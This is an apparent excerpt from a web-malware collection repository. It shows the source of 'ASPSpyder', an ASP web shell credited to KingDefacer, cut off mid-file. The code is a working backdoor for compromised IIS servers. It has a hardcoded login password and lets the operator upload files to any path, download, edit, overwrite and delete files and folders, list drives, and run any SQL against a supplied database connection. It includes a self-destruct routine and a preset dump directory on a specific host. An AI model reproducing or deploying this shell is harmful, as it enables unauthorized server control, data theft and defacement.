<table bgcolor="#505050" cellpadding="6">
<tr>
<td bgcolor="#000000" valign="bottom"><font face="Arial" size="-2" color=gray>NOTE FOR UPLOAD -
YOU MUST HAVE VBSCRIPT v5.0 INSTALLED ON YOUR WEB SERVER&nbsp; FOR THIS LIBRARY TO
FUNCTION CORRECTLY. YOU CAN OBTAIN IT FREE FROM MICROSOFT WHEN YOU INSTALL INTERNET
EXPLORER 5.0 OR LATER. WHICH IS, MOST LIKELY, ALREADY INSTALLED.</font></td>
</tr>
</table>
</form>
<%
' ---Upload Routine stops here
%>
</font><HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=1 face=arial>[ System: <%=now%> ]</font></p><BR>
</body></html>

829
web-malware-collection-13-06-2012/ASP/aspydrv.txt Normal file
View file

@ -0,0 +1,829 @@
<%
Function BufferContent(data)
Dim strContent(64)
Dim i
ClearString strContent
For i = 1 To LenB(data)
AddString strContent,Chr(AscB(MidB(data,i,1)))
Next
BufferContent = fnReadString(strContent)
End Function
Sub ClearString(part)
Dim index
For index = 0 to 64
part(index)=""
Next
End Sub
Sub AddString(part,newString)
Dim tmp
Dim index
part(0) = part(0) & newString
If Len(part(0)) > 64 Then
index=0
tmp=""
Do
tmp=part(index) & tmp
part(index) = ""
index = index + 1
Loop until part(index) = ""
part(index) = tmp
End If
End Sub
Function fnReadString(part)
Dim tmp
Dim index
tmp = ""
For index = 0 to 64
If part(index) <> "" Then
tmp = part(index) & tmp
End If
Next
FnReadString = tmp
End Function
Class FileUploader
Public Files
Private mcolFormElem
Private Sub Class_Initialize()
Set Files = Server.CreateObject("Scripting.Dictionary")
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
End Sub
Private Sub Class_Terminate()
If IsObject(Files) Then
Files.RemoveAll()
Set Files = Nothing
End If
If IsObject(mcolFormElem) Then
mcolFormElem.RemoveAll()
Set mcolFormElem = Nothing
End If
End Sub
Public Property Get Form(sIndex)
Form = ""
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
End Property
Public Default Sub Upload()
Dim biData, sInputName
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
Dim nPosFile, nPosBound
biData = Request.BinaryRead(Request.TotalBytes)
nPosBegin = 1
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
nDataBoundPos = InstrB(1, biData, vDataBounds)
Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
nPos = InstrB(nPos, biData, CByteString("name="))
nPosBegin = nPos + 6
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
nPosBound = InstrB(nPosEnd, biData, vDataBounds)
If nPosFile <> 0 And nPosFile < nPosBound Then
Dim oUploadFile, sFileName
Set oUploadFile = New UploadedFile
nPosBegin = nPosFile + 10
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
nPosBegin = nPos + 14
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
nPosBegin = nPosEnd+4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
Else
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
nPosBegin = nPos + 4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
End If
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
Loop
End Sub
'String to byte string conversion
Private Function CByteString(sString)
Dim nIndex
For nIndex = 1 to Len(sString)
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
Next
End Function
'Byte string to string conversion
Private Function CWideString(bsString)
Dim nIndex
CWideString =""
For nIndex = 1 to LenB(bsString)
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
Next
End Function
End Class
Class UploadedFile
Public ContentType
Public FileName
Public FileData
Public Property Get FileSize()
FileSize = LenB(FileData)
End Property
Public Sub SaveToDisk(sPath)
Dim oFS, oFile
Dim nIndex
If sPath = "" Or FileName = "" Then Exit Sub
If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
If Not oFS.FolderExists(sPath) Then Exit Sub
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
' output mechanism modified for buffering
oFile.Write BufferContent(FileData)
oFile.Close
End Sub
Public Sub SaveToDatabase(ByRef oField)
If LenB(FileData) = 0 Then Exit Sub
If IsObject(oField) Then
oField.AppendChunk FileData
End If
End Sub
End Class
' Create the FileUploader
IF REQUEST.QueryString("upload")="@" THEN
Dim Uploader, File
Set Uploader = New FileUploader
' This starts the upload process
Uploader.Upload()
%>
<html><title>ASPYDrvsInfo</title>
<style>
<!--
A:link {font-style: text-decoration: none; color: #c8c8c8}
A:visited {font-style: text-decoration: none; color: #777777}
A:active {font-style: text-decoration: none; color: #ff8300}
A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
* {scrollbar-base-color:#777777;
scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
//-->
</style>
<body bgcolor=black text=white>
<BR><BR><BR>
<center><table bgcolor="#505050" cellpadding=4>
<tr><td><Font face=arial size=-1>File upload Information:</font>
</td></tr><tr><td bgcolor=black ><table>
<%
' Check if any files were uploaded
If Uploader.Files.Count = 0 Then
Response.Write "File(s) not uploaded."
Else
' Loop through the uploaded files
For Each File In Uploader.Files.Items
File.SaveToDisk Request.QueryString("txtpath")
Response.Write "<TR><TD>&nbsp;</TD></TR><tr><td><font color=gray>File Uploaded: </font></td><td>" & File.FileName & "</td></tr>"
Response.Write "<tr><td><font color=gray>Size: </font></td><td>" & Int(File.FileSize/1024)+1 & " kb</td></tr>"
Response.Write "<tr><td><font color=gray>Type: </font></td><td>" & File.ContentType & "</td></tr>"
Next
End If
%>
<TR><TD>&nbsp;</TD></TR></table>
</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=Request.QueryString("txtpath")%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
<%
response.End() '---- XXX
END IF
'--------
ON ERROR RESUME NEXT
Response.Buffer = True
password = "lol" ' <---Your password here
If request.querystring("logoff")="@" then
session("shagman")="" ' Logged off
session("dbcon")="" ' Database Connection
session("txtpath")="" ' any pathinfo
end if
If (session("shagman")<>password) and Request.form("code")="" Then
%>
<body bgcolor=black><center><BR><BR><BR><BR><FONT face=arial size=-2 color=#ff8300>ADMINSTRATORS TOOLKIT</FONT><BR><BR><BR>
<table><tr><td>
<FORM method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" >
<table bgcolor=#505050 width="20%" cellpadding=20 ><tr><td bgcolor=#303030 align=center >
<INPUT type=password name=code ></td><td><INPUT name=submit type=submit value=" Access ">
</td></tr></table>
</td></tr><tr><td align=right>
<font color=white size=-2 face=arial >ASPSpyder Apr2003</font></td></tr>
</td></tr></table></FORM>
<%If request.querystring("logoff")="@" then%>
<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
<%end if%>
<center>
<%
Response.END
End If
If Request.form("code") = password or session("shagman") = password Then
session("shagman") = password
Else
Response.Write "<BR><B><P align=center><font color=red ><b>ACCESS DENIED</B></font><BR><font color=Gray >Copyright 2003 Vela iNC.</font></p>"
Response.END
End If
server.scriptTimeout=180
set fso = Server.CreateObject("Scripting.FileSystemObject")
mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME"))
mapPathLen = len(mapPath)
if session(myScriptName) = "" then
for x = mapPathLen to 0 step -1
myScriptName = mid(mapPath,x)
if instr(1,myScriptName,"\")>0 then
myScriptName = mid(mapPath,x+1)
x=0
session(myScriptName) = myScriptName
end if
next
Else
myScriptName = session(myScriptName)
end if
wwwRoot = left(mapPath, mapPathLen - len(myScriptName))
Target = "D:\hshome\masterhr\masterhr.com\" ' ---Directory to which files will be DUMPED Too and From
if len(Request.querystring("txtpath"))=3 then
pathname = left(Request.querystring("txtpath"),2) & "\" & Request.form("Fname")
else
pathname = Request.querystring("txtpath") & "\" & Request.form("Fname")
end if
If Request.Form("txtpath") = "" Then
MyPath = Request.QueryString("txtpath")
Else
MyPath = Request.Form("txtpath")
End If
' ---Path correction routine
If len(MyPath)=1 then MyPath=MyPath & ":\"
If len(MyPath)=2 then MyPath=MyPath & "\"
If MyPath = "" Then MyPath = wwwRoot
If not fso.FolderExists(MyPath) then
Response.Write "<font face=arial size=+2>Non-existing path specified.<BR>Please use browser back button to continue !"
Response.end
end if
set folder = fso.GetFolder(MyPath)
if fso.GetFolder(Target) = false then
Response.Write "<font face=arial size=-2 color=red>Please create your target directory for copying files as it does not exist. </font><font face=arial size=-1 color=red>" & Target & "<BR></font>"
else
set fileCopy = fso.GetFolder(Target)
end if
If Not(folder.IsRootFolder) Then
If len(folder.ParentFolder)>3 then
showPath = folder.ParentFolder & "\" & folder.name
Else
showPath = folder.ParentFolder & folder.name
End If
Else
showPath = left(MyPath,2)
End If
MyPath=showPath
showPath=MyPath & "\"
' ---Path correction routine-DONE
set drv=fso.GetDrive(left(MyPath,2))
if Request.Form("cmd")="Download" then
if Request.Form("Fname")<>"" then
Response.Buffer = True
Response.Clear
strFileName = Request.QueryString("txtpath") & "\" & Request.Form("Fname")
Set Sys = Server.CreateObject( "Scripting.FileSystemObject" )
Set Bin = Sys.OpenTextFile( strFileName, 1, False )
Call Response.AddHeader( "Content-Disposition", "attachment; filename=" & Request.Form("Fname") )
Response.ContentType = "application/octet-stream"
While Not Bin.AtEndOfStream
Response.BinaryWrite( ChrB( Asc( Bin.Read( 1 ) ) ) )
Wend
Bin.Close : Set Bin = Nothing
Set Sys = Nothing
Else
err.number=500
err.description="Nothing selected for download..."
End if
End if
%>
<html>
<style>
<!--
A:link {font-style: text-decoration: none; color: #c8c8c8}
A:visited {font-style: text-decoration: none; color: #777777}
A:active {font-style: text-decoration: none; color: #ff8300}
A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
* {scrollbar-base-color:#777777;
scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
//-->
</style>
<%
'QUERY ANALYSER -- START
if request.QueryString("qa")="@" then
'-------------
sub getTable(mySQL)
if mySQL="" then
exit sub
end if
on error resume next
Response.Buffer = True
Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
myConnectionString=session("dbCon")
Set myDBConnection = Server.CreateObject("ADODB.Connection")
myDBConnection.Open myConnectionString
myFlag = False
myFlag = errChk()
set rs = Server.CreateObject("ADODB.Recordset")
rs.cursorlocation = 3
rs.open mySQL, myDBConnection
myFlag = errChk()
if RS.properties("Asynchronous Rowset Processing") = 16 then
For i = 0 To rs.Fields.Count - 1
myFields = myFields & "<TD><font color=#eeeeee size=2 face=""Verdana, Arial, Helvetica, sans-serif"">" & rs.Fields(i).Name & "</font></TD>"
Next
myTitle = "<font color=gray size=6 face=webdings>?</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(" & rs.RecordCount & " row(s) affected)</TT><br>"
rs.MoveFirst
rs.PageSize=mNR
if int(rs.RecordCount/mNR) < mPage then mPage=1
rs.AbsolutePage = mPage
Response.Write myTitle & "</td><td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"
if mPage=1 Then Response.Write("<input type=button name=btnPagePrev value="" << "" DISABLED>") else Response.Write("<input type=button name=btnPagePrev value="" << "">")
Response.Write "<select name=cmbPageSelect>"
For x = 1 to rs.PageCount
if x=mPage Then Response.Write("<option value=" & x & " SELECTED>" & x & "</option>") else Response.Write("<option value=" & x & ">" & x & "</option>")
Next
Response.Write "</select><input type=hidden name=mPage value=" & mPage & ">"
if mPage = rs.PageCount Then Response.Write("<input type=button name=btnPageNext value="" >> "" DISABLED>") else Response.Write("<input type=button name=btnPageNext value="" >> "">")
Response.Write "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray>Displaying <input type=text size=" & Len(mNR) & " name=txtNoRecords value=" & mNR & "> records at a time.</font>"
response.Write "</td><TABLE border=0 bgcolor=#999999 cellpadding=2><TR align=center valign=middle bgcolor=#777777>" & myFields
For x = 1 to rs.PageSize
If Not rs.EOF Then
response.Write "<TR>"
For i = 0 to rs.Fields.Count - 1
response.Write "<TD bgcolor=#dddddd>" & server.HTMLEncode(rs(i)) & "</TD>"
Next
response.Write "</TR>"
response.Flush()
rs.MoveNext
Else
x=rs.PageSize
End If
Next
response.Write "</Table>"
myFlag = errChk()
else
if not myFlag then
myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
response.Write myTitle
end if
end if
set myDBConnection = nothing
set rs2 = nothing
set rs = nothing
End sub
sub getXML(mySQL)
if mySQL="" then
exit sub
end if
on error resume next
Response.Buffer = True
Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
myConnectionString=session("dbCon")
Set myDBConnection = Server.CreateObject("ADODB.Connection")
myDBConnection.Open myConnectionString
myFlag = False
myFlag = errChk()
set rs = Server.CreateObject("ADODB.Recordset")
rs.cursorlocation = 3
rs.open mySQL, myDBConnection
myFlag = errChk()
if RS.properties("Asynchronous Rowset Processing") = 16 then
Response.Write "<font color=#55ff55 size=4 face=webdings>i</font><font color=#cccccc> Copy paste this code and save as '.xml '</font></td></tr><tr><td>"
Response.Write "<textarea cols=75 name=txtXML rows=15>"
rs.MoveFirst
response.Write vbcrlf & "<?xml version=""1.0"" ?>"
response.Write vbcrlf & "<TableXML>"
Do While Not rs.EOF
response.Write vbcrlf & "<Column>"
For i = 0 to rs.Fields.Count - 1
response.Write vbcrlf & "<" & rs.Fields(i).Name & ">" & rs(i) & "</" & rs.Fields(i).Name & ">" & vbcrlf
response.Flush()
Next
response.Write "</Column>"
rs.MoveNext
Loop
response.Write "</TableXML>"
response.Write "</textarea>"
myFlag = errChk()
else
if not myFlag then
myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
response.Write myTitle
end if
end if
End sub
Function errChk()
if err.Number <> 0 and err.Number <> 13 then
dim myText
myText = "<font color=#ff8300 size=4 face=webdings>x</font><font color=red size=2 face=""Verdana, Arial, Helvetica, sans-serif""> " & err.Description & "</font><BR>"
response.Write myText
err.Number = 0
errChk = True
end if
end Function
Dim myQuery,mPage,mNR
myQuery = request.Form("txtSQL")
if request.form("txtCon") <> "" then session("dbcon") = request.form("txtCon")
if request.QueryString("txtpath") then session("txtpath")=request.QueryString("txtpath")
mPage=cint(request.Form("mPage"))
if mPage<1 then mPage=1
mNR=cint(request.Form("txtNoRecords"))
if mNR<1 then mNR=30
%>
<html><title>ASPyQAnalyser</title>
<script language="VbScript">
sub cmdSubmit_onclick
if Document.frmSQL.txtSQL.value = "" then
Document.frmSQL.txtSQL.value = "SELECT * FROM " & vbcrlf & "WHERE " & vbcrlf & "ORDER BY "
exit sub
end if
Document.frmSQL.Submit
end sub
sub cmdTables_onclick
Document.frmSQL.txtSQL.value = "select name as 'TablesListed' from sysobjects where xtype='U' order by name"
Document.frmSQL.Submit
end sub
sub cmdColumns_onclick
strTable =InputBox("Return Columns for which Table?","Table Name...")
strTable = Trim(strTable)
if len(strTable) > 0 Then
SQL = "select name As 'ColumnName',xusertype As 'DataType',length as Length from syscolumns where id=(select id from sysobjects where xtype='U' and name='" & strTable & "') order by name"
Document.frmSQL.txtSQL.value = SQL
Document.frmSQL.Submit
End if
end sub
sub cmdClear_onclick
Document.frmSQL.txtSQL.value = ""
end sub
sub cmdBack_onclick
Document.Location = "<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=session("txtpath")%>"
end sub
Sub btnPagePrev_OnClick
Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1
Document.frmSQL.Submit
end sub
Sub btnPageNext_OnClick
Document.frmSQL.mPage.value = Document.frmSQL.mPage.value + 1
Document.frmSQL.Submit
end sub
Sub cmbPageSelect_onchange
Document.frmSQL.mPage.value = (Document.frmSQL.cmbPageSelect.selectedIndex + 1)
Document.frmSQL.Submit
End Sub
Sub txtNoRecords_onclick
Document.frmSQL.cmbPageSelect.selectedIndex = 0
Document.frmSQL.mPage.value = 1
End Sub
</script>
<style>
TR {font-family: sans-serif;}
</style>
<body bgcolor=black>
<form name=frmSQL action="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@" method=Post>
<table border="0"><tr>
<td align=right><font color=#ff8300 size="4" face="webdings">@ </font><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">Paste
your connection string here : </font><font color="#CCCCCC">
<input name=txtCon type="text" size="60" value="<%=session("dbcon")%>">
</font><BR>
<textarea cols=75 name=txtSQL rows=4 wrap=PHYSICAL><%=myQuery%></textarea><BR>
<input name=cmdSubmit type=button value=Submit><input name=cmdTables type=button value=Tables><input name=cmdColumns type=button value=Columns><input name="reset" type=reset value=Reset><input name=cmdClear type=button value=Clear><input name=cmdBack type=button value="Return"><input type="Checkbox" name="chkXML" <%IF Request.Form("chkXML")= "on" tHEN Response.Write " checked " %>><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">GenerateXML</FONT>
</td>
<td>XXXXXX</td><td>
<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by KingDefacer</TT></font></center>
</td></tr></table>
<table><tr><td><%If Request.Form("chkXML") = "on" Then getXML(myQuery) Else getTable(myQuery) %></td></tr></table></form>
<HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=-1 color=gray>Cheers to <a href="mailto:hAshish@shagzzz.cjb.net">hAshish</a> for all the help!</font></p><BR>
</body>
</html>
<%
set myDBConnection = nothing
set rs2 = nothing
set rs = nothing
'-------------
response.End()
end if
'QUERY ANALYSER -- STOP
%>
<title><%=MyPath%></title>
</head>
<body bgcolor=black text=white topAprgin="0">
<!-- Copyright Vela iNC. Apr2003 [alturks.com] Edited By KingDefacer-->
<%
Response.Flush
'Code Optimisation START
select case request.form("cmd")
case ""
If request.form("dirStuff")<>"" then
Response.write "<font face=arial size=-2>You need to click [Create] or [Delete] for folder operations to be</font>"
Else
Response.Write "<font face=webdings size=+3 color=#ff8300>&#1570;</font>"
End If
case " Copy "
' ---Copy From Folder routine Start
If Request.Form("Fname")="" then
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\???</font><BR>"
err.number=424
Else
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\" & Request.Form("Fname") & "</font><BR>"
fso.CopyFile Request.QueryString("txtpath") & "\" & Request.Form("Fname"),Target & Request.Form("Fname")
Response.Flush
End If
' ---Copy From Folder routine Stop
case " Copy "
' ---Copy Too Folder routine Start
If Request.Form("ToCopy")<>"" and Request.Form("ToCopy") <> "------------------------------" Then
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\" & Request.Form("ToCopy") & "</font><BR>"
Response.Flush
fso.CopyFile Target & Request.Form("ToCopy"), Request.Form("txtpath") & "\" & Request.Form("ToCopy")
Else
Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\???</font><BR>"
err.number=424
End If
' ---Copy Too Folder routine Stop
case "Delete" 'two of this
if request.form("todelete")<>"" then
' ---File Delete start
If (Request.Form("ToDelete")) = myScriptName then'(Right(Request.Servervariables("SCRIPT_NAME"),len(Request.Servervariables("SCRIPT_NAME"))-1)) Then
Response.Write "<center><font face=arial size=-2 color=#ff8300><BR><BR><HR>SELFDESTRUCT INITIATED...<BR>"
Response.Flush
fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
%>+++DONE+++</font><BR><HR>
<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
<%Response.End
End If
If Request.Form("ToDelete") <> "" and Request.Form("ToDelete") <> "------------------------------" Then
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\" & Request.Form("ToDelete") & "</font><BR>"
Response.Flush
fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
Else
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\???</font><BR>"
err.number=424
End If
' ---File Delete stop
Else If request.form("dirStuff")<>"" then
Response.Write "<font face=arial size=-2 color=#ff8300>Deleting folder...</font><BR>"
fso.DeleteFolder MyPath & "\" & request.form("DirName")
end if
End If
case "Edit/Create"
%>
<center><BR><table bgcolor="#505050" cellpadding="8"><tr>
<td bgcolor="#000000" valign="bottom">
<Font face=arial SIZE=-2 color=#ff8300>NOTE: The following edit box maynot display special characters from files. Therefore the contents displayed maynot be considered correct or accurate.</font>
</td></tr><tr><td><TT>Path=> <%=pathname%><BR><BR>
<%
' fetch file information
Set f = fso.GetFile(pathname)
%>
file Type: <%=f.Type%><BR>
file Size: <%=FormatNumber(f.size,0)%> bytes<BR>
file Created: <%=FormatDateTime(f.datecreated,1)%>&nbsp;<%=FormatDateTime(f.datecreated,3)%><BR>
last Modified: <%=FormatDateTime(f.datelastmodified,1)%>&nbsp;<%=FormatDateTime(f.datelastmodified,3)%><BR>
last Accessed: <%=FormatDateTime(f.datelastaccessed,1)%>&nbsp;<%=FormatDateTime(f.datelastaccessed,3)%><BR>
file Attributes: <%=f.attributes%><BR>
<%
Set f = Nothing
response.write "<center><FORM action=""" & Request.Servervariables("SCRIPT_NAME") & "?txtpath=" & MyPath & """ METHOD=""POST"">"
'read the file
Set f = fso.OpenTextFile(pathname)
If NOT f.AtEndOfStream Then fstr = f.readall
f.Close
Set f = Nothing
Set fso = Nothing
response.write "<TABLE><TR><TD>" & VBCRLF
response.write "<FONT TITLE=""Use this text area to view or change the contents of this document. Click [Save As] to store the updated contents to the web server."" FACE=arial SIZE=1 ><B>DOCUMENT CONTENTS</B></FONT><BR>" & VBCRLF
response.write "<TEXTAREA NAME=FILEDATA ROWS=16 COLS=85 WRAP=OFF>" & Server.HTMLEncode(fstr) & "</TEXTAREA>" & VBCRLF
response.write "</TD></TR></TABLE>" & VBCRLF
%>
<BR><center><TT>LOCATION <INPUT TYPE="TEXT" SIZE=48 MAXLENGTH=255 NAME="PATHNAME" VALUE="<%=pathname%>">
<INPUT TYPE="SUBMIT" NAME=cmd VALUE="Save As" TITLE="This write to the file specifed and overwrite it without warning.">
<INPUT TYPE="SUBMIT" NAME="POSTACTION" VALUE="Cancel" TITLE="If you recieve an error while saving, then most likely you do not have write access OR the file attributes are set to readonly !!">
</FORM></td></tr></table><BR>
<%
response.end
case "Create"
Response.Write "<font face=arial size=-2 color=#ff8300>Creating folder...</font><BR>"
fso.CreateFolder MyPath & "\" & request.form("DirName")
case "Save As"
Response.Write "<font face=arial size=-2 color=#ff8300>Saving file...</font><BR>"
Set f = fso.CreateTextFile(Request.Form("pathname"))
f.write Request.Form("FILEDATA")
f.close
end select
'Code Optimisation STOP
' ---DRIVES start here
If request.querystring("getDRVs")="@" then
%>
<BR><BR><BR><center><table bgcolor="#505050" cellpadding=4>
<tr><td><Font face=arial size=-1>Available Drive Information:</font>
</td></tr><tr><td bgcolor=black >
<table><tr><td><tt>Drive</td><td><tt>Type</td><td><tt>Path</td><td><tt>ShareName</td><td><tt>Size[MB]</td><td><tt>ReadyToUse</td><td><tt>VolumeLabel</td><td></tr>
<%For Each thingy in fso.Drives%>
<tr><td><tt>
<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thingy.Path%> </td><td><tt> <%=thingy.ShareName%> </td><td><tt> <%=((thingy.TotalSize)/1024000)%> </td><td><tt> <%=thingy.IsReady%> </td><td><tt> <%=thingy.VolumeName%>
<%Next%>
</td></tr></table>
</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
<%
Response.end
end if
' ---DRIVES stop here
%>
<HEAD>
<SCRIPT Language="VBScript">
sub getit(thestuff)
if right("<%=showPath%>",1) <> "\" Then
document.myform.txtpath.value = "<%=showPath%>" & "\" & thestuff
Else
document.myform.txtpath.value = "<%=showPath%>" & thestuff
End If
document.myform.submit()
End sub
</SCRIPT>
</HEAD>
<%
'---Report errors
select case err.number
case "0"
response.write "<font face=webdings color=#55ff55>i</font> <font face=arial size=-2>Successfull..</font>"
case "58"
response.write "<font face=arial size=-1 color=red>Folder already exists OR no folder name specified...</font>"
case "70"
response.write "<font face=arial size=-1 color=red>Permission Denied, folder/file is readonly or contains such files...</font>"
case "76"
response.write "<font face=arial size=-1 color=red>Path not found...</font>"
case "424"
response.write "<font face=arial size=-1 color=red>Missing, Insufficient data OR file is readonly...</font>"
case else
response.write "<font face=arial size=-1 color=red>" & err.description & "</font>"
end select
'---Report errors end
%>
<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by KingDefacer</TT></font></center>
<font face=Courier>
<table><tr><td>
<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" name="myform" >
<Table bgcolor=#505050 ><tr><td bgcolor=#505050 >
<font face=Arial size=-2 color=#ff8300 > PATH INFO : </font></td><td align=right ><font face=Arial size=-2 color=#ff8300 >Volume Label:</font> <%=drv.VolumeName%> </td></tr>
<tr><td colspan=2 cellpadding=2 bgcolor=#303030 ><font face=Arial size=-1 color=gray>Virtual: http://<%=Request.ServerVariables("SERVER_NAME")%><%=Request.Servervariables("SCRIPT_NAME")%></Font><BR><font face=wingdings color=Gray >1</font><font face=Arial size=+1 > <%=showPath%></Font>
<BR><input type=text width=40 size=60 name=txtpath value="<%=showPath%>" ><input type=submit name=cmd value=" View " >
</td></tr></form></table>
</td><td><center>
<table bgcolor=#505050 cellpadding=4><tr><td bgcolor=black ><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?getDRVs=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>Retrieve Available Network Drives</a></td></tr>
<tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>SQL Query Analyser</A></td></tr>
<tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?logoff=@&...thankyou.for.using.ASpyder....KingDefacer!..[shagzzz.cjb.net]"><font size=-2 face=arial>+++LOGOFF+++</A></td></tr></table>
</td></tr></table>
<p align=center ><Table width=75% bgcolor=#505050 cellpadding=4 ><tr><td>
<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" ><font face=arial size=-1 >Delete file from current directory:</font><BR>
<select size=1 name=ToDelete >
<option>------------------------------</option>"
<%
fi=0
For each file in folder.Files
Response.Write "<option>" & file.name & "</option>"
fi=fi+1
next
Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value=Delete ></form></td><td>"
Response.Write "<form method=post name=frmCopyFile action=""" & Request.Servervariables("SCRIPT_NAME") & """ ><font face=arial size=-1 >Copy file too current directory:</font><br><select size=1 name=ToCopy >"
Response.Write "<option>------------------------------</option>"
For each file in fileCopy.Files
Response.Write "<option>" & file.name & "</option>"
next
Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value="" Copy "" ></form></td></tr></Table>"
Response.Flush
' ---View Tree Begins Here
Response.Write "<table Cellpading=2 width=75% bgcolor=#505050 ><tr><td valign=top width=50% bgcolor=#303030 >Folders:<BR><BR>"
fo=0
